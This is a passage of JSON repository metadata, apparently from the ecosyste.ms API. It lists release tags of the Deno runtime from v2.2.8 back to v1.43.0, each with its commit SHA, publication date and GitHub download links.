s"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit"